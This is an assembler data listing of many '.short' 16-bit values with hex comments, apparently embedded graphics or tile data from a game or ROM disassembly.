.short 48442 ## 0xbd3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 48442 ## 0xbd3a
.short 14906 ## 0x3a3a
.short 14906 ## 0x3a3a
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 15037 ## 0x3abd
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 49344 ## 0xc0c0
.short 49344 ## 0xc0c0
.short 48573 ## 0xbdbd
.short 14906 ## 0x3a3a
.short 48573 ## 0xbdbd
.short 14906 ## 0x3a3a
.short 15037 ## 0x3abd
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 48442 ## 0xbd3a
.short 14138 ## 0x373a
.short 15037 ## 0x3abd
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14906 ## 0x3a3a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 771 ## 0x303
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 14649 ## 0x3939
.short 14393 ## 0x3839
.short 1 ## 0x1
.short 0 ## 0x0
.short 14135 ## 0x3737
.short 11018 ## 0x2b0a
.short 312 ## 0x138
.short 0 ## 0x0
.short 14138 ## 0x373a
.short 2570 ## 0xa0a
.short 313 ## 0x139
.short 0 ## 0x0
.short 14903 ## 0x3a37
.short 2615 ## 0xa37
.short 14379 ## 0x382b
.short 1 ## 0x1
.short 14135 ## 0x3737
.short 2615 ## 0xa37
.short 14602 ## 0x390a
.short 1 ## 0x1
.short 14138 ## 0x373a
.short 2615 ## 0xa37
.short 14602 ## 0x390a
.short 1 ## 0x1
.short 14138 ## 0x373a
.short 14138 ## 0x373a
.short 11018 ## 0x2b0a
.short 312 ## 0x138
.short 17665 ## 0x4501
.short 47689 ## 0xba49
.short 54484 ## 0xd4d4
.short 47802 ## 0xbaba
.short 17667 ## 0x4503
.short 47689 ## 0xba49
.short 54484 ## 0xd4d4
.short 47802 ## 0xbaba
.short 10497 ## 0x2901
.short 48312 ## 0xbcb8
.short 54484 ## 0xd4d4
.short 48316 ## 0xbcbc
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 256 ## 0x100
.short 47657 ## 0xba29
.short 54980 ## 0xd6c4
.short 50372 ## 0xc4c4
.short 0 ## 0x0
.short 769 ## 0x301
.short 771 ## 0x303
.short 771 ## 0x303
.short 256 ## 0x100
.short 54457 ## 0xd4b9
.short 54341 ## 0xd445
.short 18876 ## 0x49bc
.short 47361 ## 0xb901
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 18761 ## 0x4949
.short 18761 ## 0x4949
.short 10057 ## 0x2749
.short 837 ## 0x345
.short 18761 ## 0x4949
.short 18761 ## 0x4949
.short 10057 ## 0x2749
.short 837 ## 0x345
.short 47288 ## 0xb8b8
.short 47288 ## 0xb8b8
.short 17733 ## 0x4545
.short 297 ## 0x129
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 47802 ## 0xbaba
.short 47802 ## 0xbaba
.short 10569 ## 0x2949
.short 1 ## 0x1
.short 771 ## 0x303
.short 771 ## 0x303
.short 259 ## 0x103
.short 0 ## 0x0
.short 47619 ## 0xba03
.short 841 ## 0x349
.short 10682 ## 0x29ba
.short 1 ## 0x1
.short 954 ## 0x3ba
.short 18874 ## 0x49ba
.short 47619 ## 0xba03
.short 297 ## 0x129
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 55809 ## 0xda01
.short 55924 ## 0xda74
.short 40666 ## 0x9eda
.short 30467 ## 0x7703
.short 55809 ## 0xda01
.short 884 ## 0x374
.short 771 ## 0x303
.short 771 ## 0x303
.short 54017 ## 0xd301
.short 55924 ## 0xda74
.short 40666 ## 0x9eda
.short 771 ## 0x303
.short 256 ## 0x100
.short 56026 ## 0xdada
.short 40666 ## 0x9eda
.short 771 ## 0x303
.short 256 ## 0x100
.short 29651 ## 0x73d3
.short 884 ## 0x374
.short 771 ## 0x303
.short 0 ## 0x0
.short 54017 ## 0xd301
.short 28525 ## 0x6f6d
.short 29812 ## 0x7474
.short 0 ## 0x0
.short 256 ## 0x100
.short 56019 ## 0xdad3
.short 27500 ## 0x6b6c
.short 0 ## 0x0
.short 0 ## 0x0
.short 769 ## 0x301
.short 56026 ## 0xdada
.short 771 ## 0x303
.short 29699 ## 0x7403
.short 27532 ## 0x6b8c
.short 986 ## 0x3da
.short 30979 ## 0x7903
.short 29699 ## 0x7403
.short 27532 ## 0x6b8c
.short 474 ## 0x1da
.short 926 ## 0x39e
.short 38772 ## 0x9774
.short 27788 ## 0x6c8c
.short 467 ## 0x1d3
.short 771 ## 0x303
.short 35956 ## 0x8c74
.short 55915 ## 0xda6b
.short 1 ## 0x1
.short 29699 ## 0x7403
.short 29079 ## 0x7197
.short 54124 ## 0xd36c
.short 1 ## 0x1
.short 27764 ## 0x6c74
.short 27755 ## 0x6c6b
.short 467 ## 0x1d3
.short 0 ## 0x0
.short 27755 ## 0x6c6b
.short 54234 ## 0xd3da
.short 1 ## 0x1
.short 0 ## 0x0
.short 56026 ## 0xdada
.short 259 ## 0x103
.short 0 ## 0x0
.short 0 ## 0x0
.short 49155 ## 0xc003
.short 48442 ## 0xbd3a
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 49155 ## 0xc003
.short 15037 ## 0x3abd
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 49155 ## 0xc003
.short 14927 ## 0x3a4f
.short 14138 ## 0x373a
.short 14135 ## 0x3737
.short 771 ## 0x303
.short 20416 ## 0x4fc0
.short 14135 ## 0x3737
.short 14650 ## 0x393a
.short 36611 ## 0x8f03
.short 20227 ## 0x4f03
.short 14650 ## 0x393a
.short 14905 ## 0x3a39
.short 40707 ## 0x9f03
.short 886 ## 0x376
.short 771 ## 0x303
.short 771 ## 0x303
.short 51203 ## 0xc803
.short 26769 ## 0x6891
.short 26728 ## 0x6868
.short 26728 ## 0x6868
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 24415 ## 0x5f5f
.short 24415 ## 0x5f5f
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 2618 ## 0xa3a
.short 14135 ## 0x3737
.short 14903 ## 0x3a37
.short 14649 ## 0x3939
.short 20282 ## 0x4f3a
.short 14903 ## 0x3a37
.short 2615 ## 0xa37
.short 826 ## 0x33a
.short 48899 ## 0xbf03
.short 14123 ## 0x372b
.short 14138 ## 0x373a
.short 30211 ## 0x7603
.short 886 ## 0x376
.short 20303 ## 0x4f4f
.short 2615 ## 0xa37
.short 24438 ## 0x5f76
.short 30303 ## 0x765f
.short 14851 ## 0x3a03
.short 14649 ## 0x3939
.short 24415 ## 0x5f5f
.short 24424 ## 0x5f68
.short 886 ## 0x376
.short 771 ## 0x303
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 26719 ## 0x685f
.short 26728 ## 0x6868
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14135 ## 0x3737
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 14135 ## 0x3737
.short 14906 ## 0x3a3a
.short 14135 ## 0x3737
.short 14135 ## 0x3737
.short 14649 ## 0x3939
.short 20281 ## 0x4f39
.short 14138 ## 0x373a
.short 14650 ## 0x393a
.short 826 ## 0x33a
.short 20227 ## 0x4f03
.short 14905 ## 0x3a39
.short 14905 ## 0x3a39
.short 30211 ## 0x7603
.short 886 ## 0x376
.short 14650 ## 0x393a
.short 826 ## 0x33a
.short 22902 ## 0x5976
.short 30297 ## 0x7659
.short 771 ## 0x303
.short 30211 ## 0x7603
.short 24409 ## 0x5f59
.short 22871 ## 0x5957
.short 26728 ## 0x6868
.short 30312 ## 0x7668
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 14135 ## 0x3737
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14649 ## 0x3939
.short 14649 ## 0x3939
.short 14903 ## 0x3a37
.short 14649 ## 0x3939
.short 826 ## 0x33a
.short 48899 ## 0xbf03
.short 14649 ## 0x3939
.short 826 ## 0x33a
.short 30211 ## 0x7603
.short 886 ## 0x376
.short 14927 ## 0x3a4f
.short 30211 ## 0x7603
.short 24424 ## 0x5f68
.short 30303 ## 0x765f
.short 771 ## 0x303
.short 24438 ## 0x5f76
.short 24415 ## 0x5f5f
.short 22879 ## 0x595f
.short 26728 ## 0x6868
.short 26742 ## 0x6876
.short 14135 ## 0x3737
.short 14903 ## 0x3a37
.short 14138 ## 0x373a
.short 14138 ## 0x373a
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14135 ## 0x3737
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 14135 ## 0x3737
.short 14138 ## 0x373a
.short 14649 ## 0x3939
.short 14649 ## 0x3939
.short 14903 ## 0x3a37
.short 14647 ## 0x3937
.short 826 ## 0x33a
.short 20227 ## 0x4f03
.short 14159 ## 0x374f
.short 14905 ## 0x3a39
.short 36611 ## 0x8f03
.short 886 ## 0x376
.short 14671 ## 0x394f
.short 826 ## 0x33a
.short 25206 ## 0x6276
.short 30303 ## 0x765f
.short 771 ## 0x303
.short 30211 ## 0x7603
.short 24415 ## 0x5f5f
.short 30312 ## 0x7668
.short 26728 ## 0x6868
.short 22888 ## 0x5968
.short 26719 ## 0x685f
.short 14135 ## 0x3737
.short 14135 ## 0x3737
.short 2570 ## 0xa0a
.short 825 ## 0x339
.short 14903 ## 0x3a37
.short 14903 ## 0x3a37
.short 2570 ## 0xa0a
.short 825 ## 0x339
.short 14137 ## 0x3739
.short 14138 ## 0x373a
.short 2570 ## 0xa0a
.short 825 ## 0x339
.short 48442 ## 0xbd3a
.short 14137 ## 0x3739
.short 11018 ## 0x2b0a
.short 826 ## 0x33a
.short 771 ## 0x303
.short 11066 ## 0x2b3a
.short 14891 ## 0x3a2b
.short 771 ## 0x303
.short 30312 ## 0x7668
.short 14851 ## 0x3a03
.short 826 ## 0x33a
.short 911 ## 0x38f
.short 24415 ## 0x5f5f
.short 886 ## 0x376
.short 30211 ## 0x7603
.short 886 ## 0x376
.short 24415 ## 0x5f5f
.short 26719 ## 0x685f
.short 22888 ## 0x5968
.short 872 ## 0x368
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47105 ## 0xb801
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 47107 ## 0xb803
.short 10196 ## 0x27d4
.short 47828 ## 0xbad4
.short 47655 ## 0xba27
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 952 ## 0x3b8
.short 17848 ## 0x45b8
.short 47107 ## 0xb803
.short 837 ## 0x345
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 769 ## 0x301
.short 52380 ## 0xcc9c
.short 52428 ## 0xcccc
.short 52428 ## 0xcccc
.short 39939 ## 0x9c03
.short 41377 ## 0xa1a1
.short 41377 ## 0xa1a1
.short 34977 ## 0x88a1
.short 39683 ## 0x9b03
.short 25443 ## 0x6363
.short 25443 ## 0x6363
.short 41377 ## 0xa1a1
.short 39683 ## 0x9b03
.short 34977 ## 0x88a1
.short 25480 ## 0x6388
.short 25443 ## 0x6363
.short 39683 ## 0x9b03
.short 41377 ## 0xa1a1
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 39683 ## 0x9b03
.short 25443 ## 0x6363
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 39683 ## 0x9b03
.short 24737 ## 0x60a1
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 39884 ## 0x9bcc
.short 52379 ## 0xcc9b
.short 27340 ## 0x6acc
.short 259 ## 0x103
.short 34952 ## 0x8888
.short 25443 ## 0x6363
.short 37216 ## 0x9160
.short 874 ## 0x36a
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 24675 ## 0x6063
.short 361 ## 0x169
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 24675 ## 0x6063
.short 361 ## 0x169
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 361 ## 0x169
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 361 ## 0x169
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 24407 ## 0x5f57
.short 24424 ## 0x5f68
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 26728 ## 0x6868
.short 24464 ## 0x5f90
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 26728 ## 0x6868
.short 36959 ## 0x905f
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 24415 ## 0x5f5f
.short 37008 ## 0x9090
.short 24415 ## 0x5f5f
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 24424 ## 0x5f68
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 22367 ## 0x575f
.short 26719 ## 0x685f
.short 26728 ## 0x6868
.short 24464 ## 0x5f90
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 36959 ## 0x905f
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 37008 ## 0x9090
.short 24415 ## 0x5f5f
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 22359 ## 0x5757
.short 26719 ## 0x685f
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 24424 ## 0x5f68
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 26728 ## 0x6868
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 24407 ## 0x5f57
.short 26719 ## 0x685f
.short 26728 ## 0x6868
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 36968 ## 0x9068
.short 24464 ## 0x5f90
.short 22367 ## 0x575f
.short 26719 ## 0x685f
.short 26728 ## 0x6868
.short 24464 ## 0x5f90
.short 24424 ## 0x5f68
.short 24407 ## 0x5f57
.short 26728 ## 0x6868
.short 36959 ## 0x905f
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 24415 ## 0x5f5f
.short 37008 ## 0x9090
.short 24415 ## 0x5f5f
.short 22359 ## 0x5757
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 22367 ## 0x575f
.short 24407 ## 0x5f57
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 22359 ## 0x5757
.short 36959 ## 0x905f
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 24407 ## 0x5f57
.short 37008 ## 0x9090
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 22367 ## 0x575f
.short 360 ## 0x168
.short 26728 ## 0x6868
.short 24415 ## 0x5f5f
.short 22367 ## 0x575f
.short 872 ## 0x368
.short 0 ## 0x0
.short 55809 ## 0xda01
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 55809 ## 0xda01
.short 1 ## 0x1
.short 0 ## 0x0
.short 256 ## 0x100
.short 55990 ## 0xdab6
.short 434 ## 0x1b2
.short 0 ## 0x0
.short 256 ## 0x100
.short 56016 ## 0xdad0
.short 436 ## 0x1b4
.short 0 ## 0x0
.short 46593 ## 0xb601
.short 46810 ## 0xb6da
.short 8112 ## 0x1fb0
.short 1 ## 0x1
.short 53251 ## 0xd003
.short 46810 ## 0xb6da
.short 45232 ## 0xb0b0
.short 1 ## 0x1
.short 56017 ## 0xdad1
.short 55769 ## 0xd9d9
.short 45238 ## 0xb0b6
.short 287 ## 0x11f
.short 56016 ## 0xdad0
.short 55769 ## 0xd9d9
.short 45238 ## 0xb0b6
.short 944 ## 0x3b0
.short 0 ## 0x0
.short 55809 ## 0xda01
.short 1 ## 0x1
.short 0 ## 0x0
.short 0 ## 0x0
.short 55809 ## 0xda01
.short 1 ## 0x1
.short 0 ## 0x0
.short 256 ## 0x100
.short 55990 ## 0xdab6
.short 434 ## 0x1b2
.short 0 ## 0x0
.short 256 ## 0x100
.short 56016 ## 0xdad0
.short 436 ## 0x1b4
.short 0 ## 0x0
.short 46593 ## 0xb601
.short 46810 ## 0xb6da
.short 8112 ## 0x1fb0
.short 1 ## 0x1
.short 53249 ## 0xd001
.short 46810 ## 0xb6da
.short 45232 ## 0xb0b0
.short 1 ## 0x1
.short 55990 ## 0xdab6
.short 55769 ## 0xd9d9
.short 45238 ## 0xb0b6
.short 287 ## 0x11f
.short 56016 ## 0xdad0
.short 55769 ## 0xd9d9
.short 45238 ## 0xb0b6
.short 944 ## 0x3b0
.short 46849 ## 0xb701
.short 10452 ## 0x28d4
.short 47828 ## 0xbad4
.short 48168 ## 0xbc28
.short 256 ## 0x100
.short 18871 ## 0x49b7
.short 47619 ## 0xba03
.short 841 ## 0x349
.short 0 ## 0x0
.short 769 ## 0x301
.short 771 ## 0x303
.short 771 ## 0x303
.short 256 ## 0x100
.short 47657 ## 0xba29
.short 54980 ## 0xd6c4
.short 50372 ## 0xc4c4
.short 256 ## 0x100
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 10497 ## 0x2901
.short 48312 ## 0xbcb8
.short 54484 ## 0xd4d4
.short 48316 ## 0xbcbc
.short 17665 ## 0x4501
.short 47689 ## 0xba49
.short 54484 ## 0xd4d4
.short 47802 ## 0xbaba
.short 17665 ## 0x4501
.short 47689 ## 0xba49
.short 54484 ## 0xd4d4
.short 47802 ## 0xbaba
.short 954 ## 0x3ba
.short 18874 ## 0x49ba
.short 47619 ## 0xba03
.short 297 ## 0x129
.short 47619 ## 0xba03
.short 841 ## 0x349
.short 10682 ## 0x29ba
.short 1 ## 0x1
.short 771 ## 0x303
.short 771 ## 0x303
.short 259 ## 0x103
.short 0 ## 0x0
.short 47802 ## 0xbaba
.short 47802 ## 0xbaba
.short 10569 ## 0x2949
.short 1 ## 0x1
.short 771 ## 0x303
.short 771 ## 0x303
.short 771 ## 0x303
.short 1 ## 0x1
.short 47288 ## 0xb8b8
.short 47288 ## 0xb8b8
.short 17733 ## 0x4545
.short 297 ## 0x129
.short 18761 ## 0x4949
.short 18761 ## 0x4949
.short 10057 ## 0x2749
.short 837 ## 0x345
.short 18761 ## 0x4949
.short 18761 ## 0x4949
.short 10057 ## 0x2749
.short 837 ## 0x345
.short 39683 ## 0x9b03
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 34915 ## 0x8863
.short 39683 ## 0x9b03
.short 24737 ## 0x60a1
.short 25440 ## 0x6360
.short 34915 ## 0x8863
.short 39683 ## 0x9b03
.short 25505 ## 0x63a1
.short 25443 ## 0x6363
.short 24737 ## 0x60a1
.short 39683 ## 0x9b03
.short 25480 ## 0x6388
.short 34977 ## 0x88a1
.short 24712 ## 0x6088
.short 39683 ## 0x9b03
.short 34912 ## 0x8860
.short 34952 ## 0x8888
.short 24672 ## 0x6060
.short 27139 ## 0x6a03
.short 24673 ## 0x6061
.short 24672 ## 0x6060
.short 25443 ## 0x6363
.short 769 ## 0x301
.short 26986 ## 0x696a
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 256 ## 0x100
.short 257 ## 0x101
.short 257 ## 0x101
.short 771 ## 0x303
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 25440 ## 0x6360
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 25443 ## 0x6363
.short 34977 ## 0x88a1
.short 25440 ## 0x6360
.short 873 ## 0x369
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 25443 ## 0x6363
.short 873 ## 0x369
.short 41315 ## 0xa163
.short 24712 ## 0x6088
.short 24675 ## 0x6063
.short 873 ## 0x369
.short 24672 ## 0x6060
.short 25440 ## 0x6360
.short 25699 ## 0x6463
.short 874 ## 0x36a
.short 26985 ## 0x6969
.short 26985 ## 0x6969
.short 27241 ## 0x6a69
.short 259 ## 0x103
.short 771 ## 0x303
.short 257 ## 0x101
.short 257 ## 0x101
.short 1 ## 0x1
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 36959 ## 0x905f
.short 26768 ## 0x6890
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 37008 ## 0x9090
.short 26728 ## 0x6868
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 26768 ## 0x6890
.short 24424 ## 0x5f68
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 26728 ## 0x6868
.short 22367 ## 0x575f
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 24424 ## 0x5f68
.short 22359 ## 0x5757
.short 51203 ## 0xc803
.short 37017 ## 0x9099
.short 22367 ## 0x575f
